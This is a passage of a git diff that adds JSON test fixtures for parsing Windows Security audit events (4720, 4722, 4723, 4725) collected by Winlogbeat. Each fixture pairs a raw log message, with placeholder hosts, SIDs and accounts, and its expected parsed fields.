20,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}",
+    "event": {
+      "action": "added-user-account",
+      "category": [
+        "iam"
+      ],
+      "code": "4720",
+      "kind": "event",
+      "module": "security",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing",
+      "type": [
+        "creation",
+        "user"
+      ]
+    },
+    "@timestamp": "2024-11-12T04:47:02.389000Z",
+    "action": {
+      "id": 4720,
+      "outcome": "success",
+      "properties": {
+        "AccountExpires": "%%1794",
+        "AllowedToDelegateTo": "-",
+        "DisplayName": "-",
+        "HomeDirectory": "-",
+        "HomePath": "-",
+        "LogonHours": "%%1793",
+        "NewUACList": [
+          "LOCKOUT",
+          "NORMAL_ACCOUNT"
+        ],
+        "NewUacValue": "0x214",
+        "OldUacValue": "0x0",
+        "PasswordLastSet": "%%1794",
+        "PrimaryGroupId": "513",
+        "PrivilegeList": "-",
+        "ProfilePath": "-",
+        "SamAccountName": "USER",
+        "ScriptPath": "-",
+        "SidHistory": "-",
+        "SubjectDomainName": "RESEAU-COMPANY",
+        "SubjectLogonId": "0x2a4b2040",
+        "SubjectUserName": "user-name",
+        "SubjectUserSid": "S-1-2-3",
+        "TargetDomainName": "RESEAU-COMPANY",
+        "TargetSid": "S-1-2-3-4-5-6-7",
+        "TargetUserName": "USER",
+        "UserAccountControl": [
+          "2082",
+          "2084",
+          "2089"
+        ],
+        "UserParameters": "-",
+        "UserPrincipalName": "USER@reseau.company",
+        "UserWorkstations": "-"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "12345678-abcd-ef90-1234-abcdef123456",
+      "id": "aaaaaaaa-1111-bbbb-2222-cccccccccccc",
+      "name": "AGENT",
+      "type": "winlogbeat",
+      "version": "7.12.1"
+    },
+    "host": {
+      "name": "HOST01.reseau.company"
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "user": [
+        "user-name"
+      ]
+    },
+    "user": {
+      "domain": "RESEAU-COMPANY",
+      "id": "S-1-2-3",
+      "name": "user-name"
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "HOST01.reseau.company",
+      "event_data": {
+        "NewUACList": [
+          "LOCKOUT",
+          "NORMAL_ACCOUNT"
+        ],
+        "UserAccountControl": [
+          "2082",
+          "2084",
+          "2089"
+        ]
+      },
+      "event_id": "4720",
+      "keywords": [
+        "Audit Success"
+      ],
+      "logon": {
+        "id": "0x2a4b2040"
+      },
+      "opcode": "Info",
+      "process": {
+        "pid": 612,
+        "thread": {
+          "id": 1940
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "479720536",
+      "task": "User Account Management"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json
new file mode 100644
index 000000000..94bd16fdf
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4722.json
@@ -0,0 +1,111 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+  },
+  "expected": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
+    "event": {
+      "action": "User Account Management",
+      "code": "4722",
+      "kind": "event",
+      "module": "security",
+      "original": "A user account was enabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\taccount-name\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A13C3FC\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACC_NAME\n\tAccount Domain:\t\tDOMAIN",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T08:53:57.535000Z",
+    "action": {
+      "id": 4722,
+      "outcome": "success",
+      "properties": {
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0x4a13c3fc",
+        "SubjectUserName": "account-name",
+        "SubjectUserSid": "S-1-2-3",
+        "TargetDomainName": "DOMAIN",
+        "TargetSid": "S-1-2-3-4-5",
+        "TargetUserName": "ACC_NAME"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333",
+      "id": "12345678-abcd-90ef-1234-abcdef123456",
+      "name": "PC01",
+      "type": "filebeat",
+      "version": "8.14.1"
+    },
+    "host": {
+      "architecture": "x86_64",
+      "hostname": "pc01",
+      "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+      "ip": [
+        "1.2.3.4"
+      ],
+      "mac": [
+        "AA-BB-CC-DD-EE-FF"
+      ],
+      "name": "pc01",
+      "os": {
+        "build": "17763.6414",
+        "family": "windows",
+        "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+        "name": "Windows Server 2019 Standard",
+        "platform": "windows",
+        "type": "windows",
+        "version": "10.0"
+      }
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "hosts": [
+        "pc01"
+      ],
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "account-name"
+      ]
+    },
+    "user": {
+      "domain": "DOMAIN",
+      "id": "S-1-2-3",
+      "name": "account-name",
+      "target": {
+        "domain": "DOMAIN",
+        "name": "ACC_NAME"
+      }
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "PC01.domain.com",
+      "event_id": "4722",
+      "keywords": [
+        "Audit Success"
+      ],
+      "logon": {
+        "id": "0x4a13c3fc"
+      },
+      "opcode": "Info",
+      "process": {
+        "pid": 756,
+        "thread": {
+          "id": 11608
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "13042939152",
+      "task": "User Account Management"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json
new file mode 100644
index 000000000..34874fdfb
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4723.json
@@ -0,0 +1,112 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+  },
+  "expected": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
+    "event": {
+      "action": "User Account Management",
+      "code": "4723",
+      "kind": "event",
+      "module": "security",
+      "original": "An attempt was made to change an account's password.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x4A28EBBF\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN\n\nAdditional Information:\n\tPrivileges\t\t-",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T08:59:04.757000Z",
+    "action": {
+      "id": 4723,
+      "outcome": "success",
+      "properties": {
+        "PrivilegeList": "-",
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0x4a28ebbf",
+        "SubjectUserName": "ACCOUNT",
+        "SubjectUserSid": "S-1-2-3",
+        "TargetDomainName": "DOMAIN",
+        "TargetSid": "S-1-2-3",
+        "TargetUserName": "ACCOUNT"
+      }
+    },
+    "agent": {
+      "ephemeral_id": "11111111-aaaa-2222-bbbb-333333333333",
+      "id": "123456-abcd-ef90-1234-abcdef123456",
+      "name": "PC01",
+      "type": "filebeat",
+      "version": "8.14.1"
+    },
+    "host": {
+      "architecture": "x86_64",
+      "hostname": "pc01",
+      "id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
+      "ip": [
+        "1.2.3.4"
+      ],
+      "mac": [
+        "00-11-22-33-44-55"
+      ],
+      "name": "pc01",
+      "os": {
+        "build": "17763.6414",
+        "family": "windows",
+        "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+        "name": "Windows Server 2019 Standard",
+        "platform": "windows",
+        "type": "windows",
+        "version": "10.0"
+      }
+    },
+    "log": {
+      "level": "information"
+    },
+    "related": {
+      "hosts": [
+        "pc01"
+      ],
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "ACCOUNT"
+      ]
+    },
+    "user": {
+      "domain": "DOMAIN",
+      "id": "S-1-2-3",
+      "name": "ACCOUNT",
+      "target": {
+        "domain": "DOMAIN",
+        "name": "ACCOUNT"
+      }
+    },
+    "winlog": {
+      "api": "wineventlog",
+      "channel": "Security",
+      "computer_name": "PC01.domain.com",
+      "event_id": "4723",
+      "keywords": [
+        "Audit Success"
+      ],
+      "logon": {
+        "id": "0x4a28ebbf"
+      },
+      "opcode": "Info",
+      "process": {
+        "pid": 756,
+        "thread": {
+          "id": 11608
+        }
+      },
+      "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+      "provider_name": "Microsoft-Windows-Security-Auditing",
+      "record_id": "13043050897",
+      "task": "User Account Management"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4725.json b/Beats/winlogbeat/tests/security_event_4725.json
new file mode 100644
index 000000000..31cca5f97
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4725.json
@@ -0,0 +1,111 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Elastic Winlogbeat",
+        "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b"
+      }
+    },
+    "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}"
+  },
+  "expected": {
+    "message": "{\"@timestamp\":\"2024-11-12T08:41:11.055Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4725\",\"created\":\"2024-11-12T08:41:11.637Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was disabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tjdoe\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x493FA12D\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":7304}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"jdoe\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x493fa12d\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-4-5-6\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042691344,\"event_id\":\"4725\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}",
+    "event": {
+      "action": "User Account Management",
+      "code": "4725",
+      "kind": "event",
+      "module": "security",
+      "original": "A user account was disabled.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tjdoe\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x493FA12D\n\nTarget Account:\n\tSecurity ID:\t\tS-1-2-3-4-5\n\tAccount Name:\t\tACCOUNT\n\tAccount Domain:\t\tDOMAIN",
+      "outcome": "success",
+      "provider": "Microsoft-Windows-Security-Auditing"
+    },
+    "@timestamp": "2024-11-12T08:41:11.055000Z",
+    "action": {
+      "id": 4725,
+      "outcome": "success",
+      "properties": {
+        "SubjectDomainName": "DOMAIN",
+        "SubjectLogonId": "0x493fa12d",
+        "SubjectUserName": "jdoe",
+        "SubjectUserSid": "S-1-2-3",
+        "TargetDomainName": "DOMAIN",
